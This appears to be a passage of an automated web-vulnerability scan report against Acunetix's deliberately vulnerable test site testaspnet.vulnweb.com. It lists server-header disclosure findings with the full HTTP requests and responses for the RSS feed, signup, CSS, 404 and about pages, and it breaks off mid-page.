Response Body - size: 2,118 bytes.	<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/sitemap.xml
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 283 bytes.	GET http://testaspnet.vulnweb.com/sitemap.xml HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 1245
Response Body - size: 1,245 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/styles.css
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Thu, 29 May 2008 14:36:50 GMT Accept-Ranges: bytes ETag: "c8c2136e99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2597
Response Body - size: 2,597 bytes.	body { padding-right: 0px; padding-left: 0px; list-style-position: outside; background: url(images/background.gif) #e6dccf fixed repeat-y center top; padding-bottom: 0px; margin: 0px; font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif; padding-top: 0px; list-style-type: square; } A.menu { padding-right: 10px; padding-left: 10px; color: #806640; text-decoration: none; background-color: #e6dccf; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #e6dccf; text-decoration: none; background-color: #BF8630; } A.NewsOperation { font-size: xx-small; margin-left: 5px; color: #BF8630; margin-right: 5px; text-decoration: none; } A.NewsOperation:hover { font-size: xx-small; margin-left: 5px; color: #E6B873; margin-right: 5px; text-decoration: none; } .Framed { border: #E6DCCF 1px solid; } .FramedForm { border-right: #806640 1px solid; border-top: #806640 1px solid; border-left: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .MenuBar { border-top: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .Calendar { border-right: #e6b873 1px solid; border-top: #e6b873 1px solid; border-left: #e6b873 1px solid; border-bottom: #e6b873 1px solid; } INPUT { border: #806640 1px solid; } INPUT.classic { border: none; } TEXTAREA { border: #807940 1px solid; } INPUT.PostNews { border: #807940 1px solid; width: 500px; } INPUT.Login { border: #807940 1px solid; width: 250px; } TEXTAREA.PostNews { border: #807940 1px solid; width: 500px; height: 300px; } TEXTAREA.CommentTA { border: #807940 1px solid; width: 450px; height: 100px; } .NewsDate { border-top: #e6b873 2px solid; font-size: xx-small; border-bottom: #e6b873 1px solid; } .NewsTitle { font-weight: bolder; margin-bottom: 5px; text-transform: capitalize; padding-top: 2px; } .NewsShort { padding-left: 5px; margin-bottom: 10px; } .NewsLong { padding-left: 5px; margin-bottom: 10px; border-bottom: #e6b873 1px solid; } .CommentText { margin-top: 10px; margin-bottom: 5px; } .CommentAuthor { font-size: xx-small; margin-bottom: 10px; } .Comment { clear: both; border-right: #806640 1px solid; padding-right: 5px; padding-left: 5px; float: none; padding-bottom: 5px; border-left: #806640 1px solid; width: 500px; padding-top: 5px; } .Calendar { border: solid 1px #E6B873; }
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" 